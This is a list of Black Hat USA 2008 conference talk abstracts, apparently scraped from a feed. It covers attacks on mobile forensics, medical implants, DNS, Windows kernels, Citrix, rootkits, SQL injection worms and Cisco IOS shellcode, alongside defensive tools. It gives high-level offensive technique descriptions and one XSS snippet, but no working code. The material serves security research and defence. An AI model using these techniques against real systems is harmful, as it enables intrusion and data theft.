With the increased use of SMS, performing forensics on seized mobile phones to retrieve text and multimedia messages is rapidly becoming a critical investigative requirement. As with other areas of forensics, the mobile phone forensics toolkits available today are not perfect. This talk will seek to inform the audience of various attacks we have discovered against mobile phone forensics software that allow attackers to avoid detection. Additionally, during this talk we will release and demonstrate a tool for sending and receiving covert SMS messages. Finally, we will release SMS fuzzing tools to allow vendors and users of mobile phone forensics software to test the reliability of the tools they rely upon.

Black Hat USA 2008: Itzik Kotler, jonathan Rom - Jinx - Malware 2.0

feedback@blackhat.com — Mon, 16 Mar 2009 16:30:58 -0700

Browsers nowadays are competing with operating systems as the next application development platform. The rapid development of Web 2.0 keeps pushing browser developers into implementing advanced features that allow the creation of interactive multimedia applications. This sets the grounds for a new fertile environment in which a new breed of malware can come to life. Malware that is OS and architecture independent, as covert as a cutting edge rootkit but at the same time implemented through a series of API's and a generous variety of high-level OOP languages simplifying the task.

Black Hat USA 2008: Tadayoshi Kohno, Kevin Fu - New Classes of Security and Privacy Vulnerabilities for Implantable Wireless Medical Devices

feedback@blackhat.com — Mon, 16 Mar 2009 14:34:05 -0700

Medical devices are becoming more sophisticated and wireless. We recently published an academic paper titled "Pacemakers and Implantable Cardiac Defibrillators: Software Radio Attacks and Zero-Power Defenses." In this paper we describe experiments with a real, common implantable defibrillator and show that risks are real, albeit small today. Using our own equipment, we are able to extract private information stored on the implantable defibrillator, change its settings, and even make it issue an electric shock. (We stress the patients should not be concerned about our current results, but that the community should demand stronger security mechanisms in future devices.)

Previously one of us (KF) made international news by exposing vulnerabilities in RFID credit cards, and the other of us (TK) was the first to publicly study the security of the Diebold electronic voting machine (in 2003). We've now turned our attention to implantable medical devices because we think that security will become increasingly important in the near future. Second, implantable medical device security is exactly the right tool to talk about how security community will evolve -- it's no longer just about PCs and network security -- small embedded systems are now life critical.

Come to this talk and learn about the directions of implantable medical devices, the security and privacy risks that we have experimentally discovered, and our predictions for the field. And, as a bonus, learn what drives the academic security research community and why, collectively, we've dedicated our time to studying e-voting, credit cards, and implantable medical devices, and what we think the community might turn to next. And learn some principles that will help your future systems -- whether embedded, or medical, or not -- be more secure from the start.

Black Hat USA 2008: Su Yong Kim - Vista and ActiveX Controls

feedback@blackhat.com — Mon, 16 Mar 2009 00:54:33 -0700

This presentation, will address the differences in ActiveX control vulnerabilities between Vista and XP. Internet Explorer is more secure on Vista due to UAC (User Account Control) and protected mode. However, ActiveX control vulnerabilities on Vista have nearly the same effect as those on XP. The reason for this is that ActiveX controls for Vista have been developed with a focus on compatibility, not security only. Vista needs additional techniques to successfully exploit File/Registry writing vulnerability, process execution vulnerability, and buffer overflow vulnerability. In this presentation, these techniques will be addressed in detail.

There is a common mistake that developers are liable to make with Vista. Developers sometimes install program files in low integrity folders, because they wish to update them silently. However, program files with low integrity can be overwritten easily by malicious users. I developed a tool to identify this problem.

There are two ways developers elevate privilege of ActiveX control - explicit or implicit. Implicit privilege elevation is more dangerous, because it does not require a user agreement. Implicit privilege elevation does not elevate the privilege of ActiveX control itself but uses another higher-privileged surrogate process. If privilege-elevated ActiveX controls have a critical vulnerability, malicious users can obtain higher privilege by exploiting this vulnerability. Therefore, the developer should not overuse implicit privilege elevation when writing a secure ActiveX control. Analyzers should take implicit privilege elevation of ActiveX control into consideration when they inspect ActiveX controls on Vista.

Black Hat USA 2008: Dan Kaminsky - Black Ops 2008 -- Its The End Of The Cache As We Know It

feedback@blackhat.com — Mon, 16 Mar 2009 00:50:23 -0700

DNS is at the heart of every network -- when a web site is browsed to, it says where the site is, and when an email is sent, DNS says where to. The answer is usually correct -- but not always. Six months ago, it became clear that there was an ancient design flaw, present in the original 1983 specification for DNS, that would allow any attacker to insert their own addresses for DNS names. An industry wide bug hunt commenced, culminating in a simultaneous release date of patches for virtually all platforms. We will talk about the issue, and about how a partnership between industry competitors and researchers helped protect all our customers.

Black Hat USA 2008: Alex Ionescu - Pointers and Handles, A Story Of Unchecked Assumptions In The Windows Kernel

feedback@blackhat.com — Mon, 16 Mar 2009 00:43:59 -0700

This presentation will discuss several vulnerabilities in Win32k.sys, the Windows NT kernel-mode library responsible for the Windows GUI Subsystem, ranging from privileged-path denial-of-service attacks due to bad assumptions regarding the validity of pointers before they are dereferenced, to the more dangerous unprivileged attacks, which leave any Windows NT-based operating system vulnerable to a local denial-of-service attack from a user with logon privileges (including a guest account).

First, a couple of unchecked pointer dereferences will be exposed, caused by a typical programming bug of assuming the occurrence of a certain initialization stage, which actually may not have actually occurred (either by design, or due to timing). These kinds of bugs are amplified when the code makes assumptions due to the undocumented nature of the interface, and uses this assumption in lieu of pointer validation.

The second programming error that will be exposed is a combination of incorrect trust of user-mode accessible handles, especially non-privileged access, and incorrect usage of Nt versus Zw APIs when dealing with user-mode data. The kernel mechanism of “protect from close”handles will be explained, as well as to how it can be used to attack Win32k.sys

This second part will be the most focused part of the presentation, since it is a pretty new kind of vulnerability that has been overlooked until now, mostly because it typically only allows DoS or information leaks -- in today's Terminal Services/Multi-User world however, it simply cannot continue to be ignored.

Black Hat USA 2008: Chet Hosmer - Metamorphic / Polymorphic Malware DNA

feedback@blackhat.com — Mon, 16 Mar 2009 00:41:32 -0700

Malware impacts on digital investigations go far beyond the Trojan horse defense as the proliferation of stealthy polymorphic and metamorphic malware continues to evolve. Digital investigators must understand the subtle nuisances of sophisticated threats in order to solve sophisticated digital crimes. Traditional forensic investigation methods fall-short in providing investigators vital information regarding the signature, behavior, remnants or characteristics of metamorphic/polymorphic malware.

This presentation and accompanying paper quantifies the impact of polymorphic and metamorphic threats on the digital investigator and explores non-traditional approaches to investigation. The paper provides a DNA Taxonomy approach for examining and discovering characteristics (live and postmortem) exhibited by these advanced threats.

Black Hat USA 2008: Oded Horovitz - Virtually Secure

feedback@blackhat.com — Mon, 16 Mar 2009 00:40:27 -0700

Virtualization is a disruptive technology in the data-center which opens the path for new solutions for old problems.

Specifically, virtualization allows the isolation of a particular workload (an application within a VM) from the underlining hardware, and enables the creation of software services which can run independent of the original workload.

The presentation will focus on the capabilities of the security application as services of the hypervior. How these new services compare with existing security agents which run inside virtual machines, and what is the possible future of workload security in a virtual data-center.

Black Hat USA 2008: Brian Holyfield - Protecting Vulnerable Applications with IIS7

feedback@blackhat.com — Mon, 16 Mar 2009 00:30:13 -0700

With the advent of IIS7 and its modular design, Microsoft has provided the ability to easily integrate custom ASP.NET HttpModules into the IIS7 request-handling pipeline. This session will present an IIS7 module designed to leverage this architecture to actively and dynamically protect web applications from attack. With minimal configuration, the module can be used to protect virtually any application running on the web server, including non-ASP.NET applications (such as those written in PHP, Cold Fusion, or classic ASP).

This presentation will outline the overall design and architecture of the module, including a detailed explanation of available features and attack defense techniques. The session will focus on live demonstrations of how the module can easily be installed to protect already-deployed applications and how it can block both traditional web application attacks, such as SQL injection and Cross-Site Scripting, and application-specific vulnerabilities like parameter manipulation and authorization attacks.

Following this presentation, the module will be available for free download and use.

Black Hat USA 2008: Billy Hoffman - Circumventing Automated JavaScript Analysis Tools

feedback@blackhat.com — Mon, 16 Mar 2009 00:27:20 -0700

JavaScript is fast becoming the vehicle of choice for malware authors. Over the last 3 years we’ve seen how attackers can use vanilla JavaScript to create powerful payloads such as intranet port scanning and hijacking, information theft, and even full web security assessments and SQL injection attacks. Even traditional browser or operating system attacks are being delivered to victims through the browser encased inside a JavaScript packed IFrame. Obfuscated JavaScript payloads are the norm thanks to malware frameworks like MPACK. With so many security threats being launched through JavaScript it is crucial to explore the capabilities of the tools researchers have to analyze malicious JavaScript as well as countermeasures that can be taken against them.

In this presentation we will explore the tit-for-tat battle between malicious JavaScript authors and security researchers. We will look at the current tricks and techniques used to protect malicious JavaScript from analysis, such as dynamic encoding (JS/Wonka), deliberate tool breaks (, etc), unmodifiable functions, and network nonce. We will how see how researcher tools such as CaffineMoney and Decrypt JS attempt to defeat these current tricks and analyze basic obfuscated JavaScript.

Next we explore multiple new techniques to circumvent the current generation of automated analysis tools by detecting their presence from inside malicious JavaScript. (JSPill? hmmmm) These methods include HTTP/browser fingerprinting, DOM testing and encrypting, Doman and Network testing, Execution environment testing, and cross plugin communication testing. We will demonstrate malicious JavaScript detecting analysis tools using these methods and refusing to give up its secrets until its running in the web browser of choice. We’ll demonstrate encrypting JavaScript to only run in particular browsers or environments. We’ll also demonstrate a couple other tricks, such as encoding malicious JavaScript as nothing but white space, and function clobbering for fun and profit.

Finally we discuss countermeasures to the countermeasures, and offer feature ideas and advice for researchers developing the 3rd generation of automated JavaScript analysis tools.

Black Hat USA 2008: Christofer Hoff - The Four Horsemen of the Virtualization Security Apocalypse

feedback@blackhat.com — Mon, 16 Mar 2009 00:24:21 -0700

Despite shiny new stickers on the boxes of our favorite security vendors' products that advertise "virtualization ready!" or the hordes of new startups emerging from stealth decrying the second coming of security, there exists the gritty failed reality of attempting to replicate complex network and security topologies in virtualized environments.

This talk will clearly demonstrate that unless we radically rethink our approach, the virtualization security apocalypse is nigh!

This talk will focus on both securing virtualization as well as virtualizing security; from virtualization-enabled chipsets to the hypervisor to the VM's, we'll explore the real issues that exist today as well as those that are coming that aren't being discussed or planned for.

Black Hat USA 2008: Ben Hawkes - Attacking the Vista Heap

feedback@blackhat.com — Mon, 16 Mar 2009 00:20:04 -0700

This presentation explores the cutting edge of heap exploitation theory and practice on Windows Vista. The focus is on finding previously unknown attack vectors resulting from memory corruption on the heap. These include techniques for controlling execution flow by attacking only the heap implementation and not the application itself, and techniques for attacking the application in conjunction with the heap. Additionally, several design changes to further improve the security of the Vista heap will be suggested.

The heap is the userland component in charge of dynamic memory management. It is present and used to some extent in every Windows Vista process. Memory corruption on the heap (heap overflow) is common, seen in nearly every application and making up a large portion of reported vulnerabilities. With Windows Vista, Microsoft introduced several security features to the heap, effectively hardening it from classic heap overflow exploit techniques.

Black Hat USA 2008: Shanit Gupta - Got Citrix, Hack It!

feedback@blackhat.com — Mon, 16 Mar 2009 00:16:18 -0700

Citrix is a widely used remote desktop application utilized in many major corporations around the world. In addition to offering the typical benefits of RDP and Microsoft terminal services, it is capable of sandboxing and restricting the applications that can be executed by the user. Unfortunately, often times the Citrix environment can introduce a false sense of security within organizations. There are several ways to circumvent security controls within the Citrix framework and many system administrators are not aware of these attacks. During this presentation, we’ll demonstrate ways in which to compromise the Citrix environment using multiple attack vectors. Then we’ll show you the corresponding remediation strategies.

Black Hat USA 2008: Ilfak Guilfanov - Decompilers and Beyond

feedback@blackhat.com — Mon, 16 Mar 2009 00:13:04 -0700

Disassemblers are routinely used for reverse engineering but their inherent limitations make them ineffective for modern large applications. In order to cope with the volume and complexity, we have to switch to the next level of binary code analysis: decompilation.

In this presentation we will discuss the process of decompiler construction, the encountered problems and solutions. Our slides will show the decompilation process step by step.

Decompilers open the way to new tools and analysis methods - we will also briefly have a discussion on them.

Black Hat USA 2008: Lukas Grunwald - Hacking and Injecting Federal Trojans part 2

feedback@blackhat.com — Mon, 16 Mar 2009 00:10:01 -0700

Remote Forensic Software or "offensive security" is the new trend in law enforcement and the fight against terrorism.

The topic is known in Germany as "Federal Trojan". This talk will give an introduction to the needs and problems with classic lawful interception and new remote methods. The problem of poisoning of evidence after a "Trojan" attack from law enforcement, as well as new attack vectors for bad guys are discussed.

This talk will give a demonstration of an "infection proxy" which shows how to inject malware on the fly while downloading some software, how to bypass commercial security solutions like virii-scanner and anti-malware tools, and how effective Trojan attacks could be if your ISP is helping law enforcement. Methods for anti-remote-forensics are handled as well. Methods of detection of infection proxies and other lawful interception methods are shown.

Black Hat USA 2008: Lukas Grunwald - Hacking and Injecting Federal Trojans part 1

feedback@blackhat.com — Mon, 16 Mar 2009 00:07:14 -0700

Black Hat USA 2008: Jeremiah Grossman, Trey Ford - Get Rich or Die Trying - "Making Money on The Web, The Black Hat Way"

feedback@blackhat.com — Mon, 16 Mar 2009 00:03:10 -0700

Forget Cross-Site Scripting. Forget SQL Injection. If you want to make some serious cash on the Web silently and surreptitiously, you don’t need them. You also don’t need noisy scanners, sophisticated proxies, 0-days, or ninja level reverse engineering skills -- all you need is a Web browser, a clue on what to look for, and a few black hat tricks. Generating affiliate advertising revenue from the Website traffic of others, trade stock using corporation information passively gleaned, inhibit the online purchase of sought after items creating artificial scarcity, and so much more. Activities not technically illegal, only violating terms of service.

You may have heard these referred to as business logic flaws, but that name really doesn’t do them justice. It sounds so academic and benign in that context when the truth is anything but. These are not the same ol’ Web hacker attack techniques everyone is familiar with, but the one staring you in the face and missed because gaming a system and making money this way couldn’t be that simple. Plus IDS can’t detect them and Web application firewalls can’t black them. If fact, these types of attacks are so hard to detect (if anyone is actually trying) we aren’t even sure how widespread their use actually is. Time to pull back the cover and expose what’s possible.

Black Hat USA 2008: Travis Goodspeed - Side-channel Timing Attacks on MSP430 Microcontroller Firmware

feedback@blackhat.com — Sun, 15 Mar 2009 23:58:34 -0700

The Texas Instruments MSP430 low-power microcontroller is used in many medical, industrial, and consumer devices. It may be programmed by JTAG, Spy-Bi-Wire, or a serial BootStrap Loader (BSL) which resides in masked ROM.

By design, JTAG may be disabled by blowing a fuse. The BSL may be disabled by setting a value in flash memory. When enabled, the BSL is protected by a 32-byte password. If these access controls are circumvented, a device's firmware may be extracted or replaced.

After a thorough introduction, this talk will discuss in excruciating detail the results of an effort to reverse engineer the BSL code. Once the BSL's function has been covered, a timing attack will be discussed which might be used to guess the password without brute force under certain conditions.

Black Hat USA 2008: Tal Garfinkel - Taking the Hype Out of Hypervisors

feedback@blackhat.com — Sun, 15 Mar 2009 22:53:49 -0700

The adoption of virtual machine technology is one of the most dramatic changes to enterprise computing in the last decade, unsurprisingly these changes have substantial implications for system security. Unfortunately, much of the current debate around virtual machine security focuses on issues that are either intractable, such as the probability of virtual machine escapes failures, trivial, such as discrepancies between current virtual and real network gear, or red herrings, such as virtual machine based rootkits.

This talk offers an antidote for the current state of affairs. To begin, I help put these previous points of debate into perspective. Next, I move on to explore more fundamental changes brought on by the move to virtualization such as rapid scaling and increased diversity, increased mobility, loss of machine identity and problems of accountability, discrepancies between real and virtual time, and how these changes have created new operational challenges as well as posing difficulties for existing security architectures. Finally, I discuss what virtual infrastructure vendors and security technology developers need to do to cope with these challenges.

Black Hat USA 2008: Oliver Friedrichs - Threats to the 2008 Presidential Election (and more)

feedback@blackhat.com — Sun, 15 Mar 2009 22:43:24 -0700

While we first saw the Internet used extensively during the 2004 Presidential election, its use in future presidential elections will clearly overshadow it. This session focuses on the 2008 presidential election in order to demonstrate the risks involved, however our findings may just as well apply to any future election.

It is important to understand the associated risks as political candidates increasingly turn to the Internet to more effectively communicate their positions, rally supporters, and seek to sway critics. These risks include among others the dissemination of misinformation, fraud, phishing, malicious code, and the invasion of privacy. Some of these attacks, including those involving the diversion of online campaign donations have the potential to threaten voters' faith in our electoral system.

We will show that many of the same risks that we have grown accustomed to on the Internet can also manifest themselves when applied to the election process. A number of past studies have discussed a broad spectrum of election fraud such as the casting of fraudulent votes and the security, risks, and challenges of electronic voting. Our discussion will focus exclusively on Internet-borne threats, and how they have the potential to impact the election process leading up to voting day.

We will discuss domain name abuse, including typo squatting and domain speculation as it relates to candidate Internet domains. We will present and demonstrate how widespread this activity has already become.

Secondly, we will discuss the potential impact of phishing on an election.

Thirdly, we will discuss the impact of security risks and malicious code, and the potential for misinformation that may present itself using any of these vectors. These set of risks cross technical, social, and psychological boundaries. While traditional forms of malicious code certainly play an important role, social engineering and deception provide equal potential and have a more ominous psychological impact on voters who are exercising their right to elect their next president, or cast their vote in any other type of election.

This session consists of a combination of active research conducted by the presenter as well as discussion on how current threats may be customized. In order to determine the impact of typo squatting and domain name speculation for example, we performed an analysis of 2008 presidential election candidate web sites and discovered numerous examples of abuse.

Black Hat USA 2008: Eric Filiol - Passive and Active Leakage of Secret Data from Non Networked Computer part 2

feedback@blackhat.com — Sun, 15 Mar 2009 22:35:22 -0700

This talk addresses the issue of stealing data from computer or systems that are never or quite never connected to any network, due to their critical status. The security target assumes that the attacker may have a very limited direct (physical access) or indirect access (through any innocent user) to the computer, for a very small amount of time and at the initial part of his attack. His problem is to collect data from the computer he manages to compromise (active attack) or which has been identified as containing some exploitable weakness, but without using any network connection (including wireless -- WiFi, Bluetooth... -- communication protocols).

In this talk we are going to recall the very few open existing techniques and then present some new approaches that we design in our lab, based on mathematical signal treatment. A demo will be made with respect to our new technique.

Black Hat USA 2008: Eric Filiol - Passive and Active Leakage of Secret Data from Non Networked Computer part 1

feedback@blackhat.com — Sun, 15 Mar 2009 22:31:55 -0700

Black Hat USA 2008: Arian Evans - Encoded, Layered, and Trancoded Syntax Attacks: Threading the Needle past Web Application Security Controls

feedback@blackhat.com — Sun, 15 Mar 2009 22:27:49 -0700

Learn how to breathe new life into your old web application zero-day syntax attacks. Even learn how to alert(document.cookie) with new-found panache.

By properly encoding, double-encoding, and triple-encoding, or by utilizing newer undocumented, transcoding-attacks, it is possible to bypass many common web application security controls to successfully exploit the target parser.

Most importantly: These attacks are being used in the wild, right now, today. Starting in February 2008 the first double-encoded, layer mass SQL Injection attacks were discovered in the wild. As of May 1st they have compromised over 600,000 websites.

This presentation will discuss how these attacks work:
+ from creation
+ to exploit
+ to dependencies;
+ what software they target;

Finally we will demonstrate how to resolve these issues through modern software design and coding practices.

Black Hat USA 2008: Shawn Embleton and Sherri Sparks - A New Breed of Rootkit: The System Management Mode (SMM) Rootkit

feedback@blackhat.com — Sun, 15 Mar 2009 22:24:01 -0700

Virtualization rootkits have been a hot topic for the past couple of years. In this talk, we will discuss a new type of malware with potentially even greater stealth: The System Management Mode (SMM) Rootkit. System Management Mode, a relatively obsecure mode on Intel processors, provides an isolated memory and execution environment. SMM code is invisible to the Operating System yet retains full access to host physical memory and complete control over peripheral hardware. We will demo a proof of concept SMM rootkit that functions as a chipset level keylogger. Our rootkit hides its memory footprint, makes no changes to the host Operating System, and is capable of covertly exfiltrating sensitive data across the network while evading essentially all host based intrusion detection systems and firewalls.

Black Hat USA 2008: Chris Eagle and Tim Vidas - Next Generation Collaborative Reversing with Ida Pro and CollabREate

feedback@blackhat.com — Sun, 15 Mar 2009 22:19:35 -0700

A major drawback with the use of most reverse engineering tools is that they were not designed with collaboration in mind. Numerous kludgy solutions exist from asynchronous use of the same data files to working on multiple copies of data files which quickly diverge leaving the differences to somehow be reconciled. Pedram Amini's Ida Sync provided a first step towards automated collaboration among Ida users however Ida Sync suffers from several shortcomings including the fact that it has failed to keep pace with the evolution of Ida's internal architecture. In this presentation, the authors present a new tool titled collabREate designed to bring nearly effortless collaboration to Ida users. The talk will include discussion of the IDA API and the ways in which it facilitates collaboration along with the ways in which it hinders collaboration. The design of a robust server component, responsible for managing projects and connected clients will also be discussed along with a number of capabilities beyond simple collaboration that are enabled via the collabREate architecture.

Black Hat USA 2008: Nitesh Dhanjani and Billy Rios - Bad Sushi: Beating Phishers at Their Own Game

feedback@blackhat.com — Sun, 15 Mar 2009 21:56:24 -0700

This talk will expose the tools and tactics used in the phishing underground. What started as a simple examination of phishing sites, turned into an extraordinary view of the ecosystem that supports the phishing effort that plagues modern day financial institutions and their customers.

Follow us as we track real life phishers hiding in the shadiest corners of the Internet, analyze the tools used by phishers, determine if these phishers are really the Einsteinian Ninja Hackers the media portrays them to be, uncover how phishers phish other phishers, and discover the sites where real life identities are being bought and sold.

Black Hat USA 2008: Jared DeMott - AppSec A-Z: Reverse Engineering, Source Code Auditing, Fuzzing, and Exploitation part 2

feedback@blackhat.com — Sun, 15 Mar 2009 21:52:37 -0700

For many years hackers have been reversing code, scanning source, fuzzing applications, and crafting lethal exploits. It’s time for security researchers, consultants, testers, and administrators to freshen up their skills by walking back through the computer science fundamentals of these techniques. This is a Deep Knowledge lecture series intended to bring newbs up from the ground, and to hone and challenge pros that have been at it for a while. Bring your Red Bull as the prior Prof. DeMott walks through 6 lectures that he designed for his security class.

Black Hat USA 2008: Jared DeMott - AppSec A-Z: Reverse Engineering, Source Code Auditing, Fuzzing, and Exploitation part 1

feedback@blackhat.com — Sun, 15 Mar 2009 21:49:47 -0700

Black Hat USA 2008: Bruce Dang - Methods for Understanding Targeted Attacks with Office Documents

feedback@blackhat.com — Sun, 15 Mar 2009 21:43:56 -0700

As more security features and anti-exploitation mechanisms are added to modern operating systems, attackers are changing their targets to higher-level applications. In the last few years, we have seen increasing targeted attacks using malicious Office documents against both government and non-government entities. These attacks are well publicized in the media; unfortunately, there is not much public information on attack details or exploitation mechanisms employed in the attacks themselves. This presentation aims to fill the gap by offering:
(1) A brief overview of the Office file format.
(2) In-depth technical details and practical analytical techniques for triaging and understanding these attacks.
(3) Defensive mechanisms to reduce the effectiveness of the attacks.
(4) Forensics evidence that can help trace the attacks.
(5) [If we have time] Static detection mechanism for these vulnerabilities (i.e., how to write virus signatures for these vulns).
(6) Techniques to help detect these attacks on the wire.
(7) A surprise. :)

Black Hat USA 2008: Jesse D'Aguanno - iRK - Crafting OS X Kernel Rootkits

feedback@blackhat.com — Sun, 15 Mar 2009 21:40:03 -0700

Over the last few years, OS X has captured much attention in the security industry. Techniques in shellcode development, exploits, etc. have been widely publicized and spoken on, yet the subject of covertly maintaining access once gained has not been adequately covered.

This talk will build on previous rootkit research, applying rootkit and kernel subversion techniques from the Windows, Linux and BSD worlds to Apple's OS X operating system as well as taking advantage of some of the unique features of OS X. It will detail topics such as: Introducing code into the XNU kernel (Basic KEXT development), Hooking, Direct Kernel Object Manipulation, Patching Running Kernel Memory, etc. It will cover some of the pitfalls encountered while developing rootkits for OS X and how to overcome them.

Finally, we will combine these techniques and demonstrate a useful PoC rootkit which can form the foundation for your own real-world rootkit.

Black Hat USA 2008: Greg Conti and Erik Dean - Visual Forensic Analysis and Reverse Engineering of Binary Data

feedback@blackhat.com — Sun, 15 Mar 2009 21:44:27 -0700

For decades hex was the common tongue of reverse engineers and forensic analysts, but we can do better. Hex editors are the Swiss Army knives of low level analysis and have evolved significantly, but are now at a local maximum. With the tiny textual window hex provides, it is difficult, if not impossible to understand the big picture context and inner workings of binary objects - files, file systems, process memory, and network traffic. While there are helpful tools to analyze the special case of executable files, little work exists to help address the general case of _all_ types of binary objects. This talk presents visual approaches to improve the art and science of forensic analysis, diffing, and reverse engineering, both in the context independent case where little is known about the raw structure of the binary data and at the semantic level where external knowledge can be used to inform analysis. Two open source visual analysis tools, each with a different perspective on visual reverse engineering and forensics, will be demonstrated and released, as well as a comprehensive survey of security visualization systems. If you read hex, you should attend this talk.

Black Hat USA 2008: Justin Clarke - SQL Injection Worms for Fun and Profit

feedback@blackhat.com — Sun, 15 Mar 2009 21:34:26 -0700

Earlier this year the first (publicly known) SQL Injection worm appeared. This worm used SQL Injection to insert malicious scripting tags into the pages of over 90,000 sites that were vulnerable to SQL injection.

Yet the exploit vector was fairly innocuous, easy to clean up, and easy to block. In other words, very much version 0.1 of what a SQL Injection worm can achieve.

This talk is going to discuss how far the rabbit hole can go with SQL injection based worms, including full compromise of the server OS, and why we should be worried by what is going to be coming next out of Russia/China/wherever, including a live demo of a proof of concept SQL injection worm, "weaponized".

Black Hat USA 2008: Gyan Chawdhary and Varun Uppal - Cisco IOS Shellcodes/Backdoors

feedback@blackhat.com — Sun, 15 Mar 2009 21:34:36 -0700

It has been more than three years since Michael Lynn first demonstrated a fully interactive shell code at Blackhat 2005 for Cisco's proprietary Internetworking Operating System (IOS). However, due to the legal obligations imposed by Cisco and ISS, the technical information surrounding this research could not be revealed in greater detail, which stifled continued security research in this area. The presentation will cover significant advances in IOS shell code development and looks at its subsequent impact on modern day routing infrastructure. IOS specific payloads including bind shell, reverse shell, 2 byte shell codes and bypassing the check heaps process in IOS 12.4 shall all be covered from both a practical and theoretical standpoint as well as a detailed overview of IRM's techniques used to develop these payloads. Furthermore, building a complete IOS debugging environment and identifying new attack vectors will also be covered in the presentation, allowing researchers to establish a fully working environment to develop IOS specific code, execution payloads, memory resident backdoors and to conduct vulnerability research on Cisco embedded devices.

Black Hat USA 2008: Jacob Carlson and Kevin Stadmeyer - FLEX, AMF 3 and BlazeDS: An Assessment

feedback@blackhat.com — Sun, 15 Mar 2009 21:34:45 -0700

Adobe FLEX with BlazeDS offers developers a streamlined application development paradigm, letting them create rich Internet applications with little exertion. As always, though, ease of implementation often results in incomplete engineering. In this presentation Jacob Carlson and Kevin Stadmeyer offer their assessment of the FLEX and BlazeDS application architectures as well as a detailed examination of the Action Message Format version 3. We will provide developers and administrators clear examples of how to do things wrongly, how to do them rightly and explain exactly how each component works internally.

Black Hat USA 2008: Yuriy Bulygin - Insane Detection of Insane Rootkits: Chipset Based Approach to Detect Virtualization Malware

feedback@blackhat.com — Sun, 15 Mar 2009 21:45:47 -0700

This work introduces an approach to detect hardware-assisted virtualization malware different from currently developed techniques. It uses hardware capabilities of an embedded microcontroller inside chipset's north-bridge to detect virtualization malware, and to go beyond detection and remove it from the system. We will discuss advantages and other potential applications of the approach, possible attacks evading detection and solutions.

This talk will also include a demo of DeepWatch, a proof of concept detector of VT-x based virtualization rootkits implemented in north-bridge firmware.

Black Hat USA 2008: Ivan Beutler - SmartCard APDU Analysis

feedback@blackhat.com — Sun, 15 Mar 2009 21:34:58 -0700

SmartCards are commonly used for authentication, or securing e-mails or transactions. The concept armors crypto functions to a tamper proof architecture. Software cannot be protected by Software - and this paradigm forces the need for secure devices. But how does it work? How does a Windows computer communicate to the SmartCard device? Can hackers inject malware in between the communication? This presentation addresses this items. The Compass Security APDU debugger allowes you to halt, alter, intercept APDU commands and disclose hidden secrets. The APDU debugger is part of the presentation.

Black Hat USA 2008: Joshua Bienfang - Free-Space Quantum Key Distribution at GHz Transmission Rates

feedback@blackhat.com — Sun, 15 Mar 2009 21:35:06 -0700

Quantum mechanics make possible some things that are impossible in the "classical" world of ordinary experience, and which even seem to contradict common sense. Some of these spooky effects are coming into practical use in security applications. The Quantum Spookshow of the National Institute of Standards and Technology (NIST) and the National University of Singapore (NUS) demonstrates quantum cryptography and quantum entanglement on a four-node quantum network, which supports quantum encrypted streaming video and violations of local realism. Participants are encouraged to interact with the light beams that constitute the physical link of this network, and to meet physicists who have designed and built quantum networks. Quantum mechanics provides methods of encryption that are secure from eavesdropping attacks against the quantum channel, but in any actual system there are points of vulnerability, e.g. correlations of classical noise in the operation of quantum elements. Participants will have a chance to discover vulnerabilities by hands-on interaction with our systems. Dr. Joshua Bienfang will give a Turbo Talk on quantum encryption at Black Hat at 4:45 p.m. on Thursday, August 7. This demo to run 1330 to 1930 on Wednesday, 1200 to 1800 on Thursday, in Turin Room located on the Third Floor. For further information, see http://havephotonswilltravel.com

Black Hat USA 2008: Ohad Ben-Cohen - No More 0-Days (or Code-Based Intrusion Detection by Korset)

feedback@blackhat.com — Sun, 15 Mar 2009 21:35:17 -0700

In order to identify malicious activity, Host-based Intrusion Detection Systems often monitor the system calls emitted by a process, and then compare them to a pre-constructed model of normal behavior. The model can either be learned during a training session, or manually written by the user. Alas, the former suffers from false positives, and therefore repeatedly requires user intervention, and the latter is tedious and demanding.

In this talk we present an automated, zero false alarm, whitebox approach that effectively targets 0-day code injection exploits:

By statically analyzing an application's source/object code, we build its control flow graph (CFG), which is then used by the Kernel to verify the legitimacy of the issued system calls and their order. This method enjoys a powerful property of provable zero false positives, since a deviation from a (non self-modifying) program's CFG can only be explained as an intrusion.

We present Korset, an Open Source Linux prototype which implements this approach via:

* An automatic analyzer that builds the CFG as part of the compilation process
* A kernel agent that enforces the policy induced by the CFG, and terminates subverted processes.

We have successfully used Korset to automatically construct CFGs for the entire GNU C library, and demonstrated its ability to block buffer overflow attacks.

Korset introduces a viable IDS methodology that can stop future, or publicly-unknown exploits. Furthermore, run time performance measurements of Korset show negligible overheads.

In collaboration with Avishai Wool, Tel-Aviv University.

Black Hat USA 2008: John Benson - When Lawyers Attack: Dealing With the New Rules of Electronic Discovery part 2

feedback@blackhat.com — Sun, 15 Mar 2009 21:35:25 -0700

The legal community is slowly accepting that the changes to the Federal rules which change the law's approach to electronic evidence are not going away. Vendors are clamoring to sell their e-discovery "solutions" to law firms and corporations alike, often taking advantage of the uncertainty that comes with such sweeping changes to the law.

The changes to the Federal Rules change the way in which individuals and organizations approach their data much in the same way Sarbanes-Oxley has over the past few years. Instead of merely creating compliance headaches for security professionals, however, these changes take data security out of the hands of those charged to protect it and spread data to the wind.

More frightening for individuals doing security research is the fact that these rules apply to the one man research operation as the multimillion dollar conglomerate in the same way.

This talk outlines how the electronic discovery process works, why it is costing corporations millions of dollars (but doesn't have to) and will empower attendees with the knowledge they need to deal with this new legal environment.

Black Hat USA 2008: John Benson - When Lawyers Attack: Dealing With the New Rules of Electronic Discovery part 1

feedback@blackhat.com — Sun, 15 Mar 2009 21:35:35 -0700

Black Hat USA 2008: Luciano Bello and Maximiliano Bertacchini - Predictable RNG in the Vulnerable Debian OpenSSL package, the What and the How

feedback@blackhat.com — Sun, 15 Mar 2009 21:35:45 -0700

Recently, the Debian project announced an OpenSSL package vulnerability which they had been distributing for the last two years. This bug makes the PRNG predictable, affecting the keys generated by openssl and every other system that uses libssl (eg. openssh, openvpn). We will talk about this bug, its discovery and publication, its consequences, and exploitation. As well, we will demonstrate some exploitation tools.

Black Hat USA 2008: Tiller Beauchamp and David Weston - RE:Trace - Applied Reverse Engineering on OS X

feedback@blackhat.com — Sun, 15 Mar 2009 21:35:57 -0700

This presentation will detail the newest developments in RE:Trace, a reverse engineering framework based on Ruby and DTrace. We will discuss implementations for walking and searching the heap on OS X, tracing for kernel and driver vulnerabilities, pinpointing format string bugs and leveraging custom application probes, such as those built into browser and database software.

Black Hat USA 2008: Dan Bailey and Martin Mocko - Winning the Race to Bare Metal – UEFI Hypervisors

feedback@blackhat.com — Sun, 15 Mar 2009 21:36:09 -0700

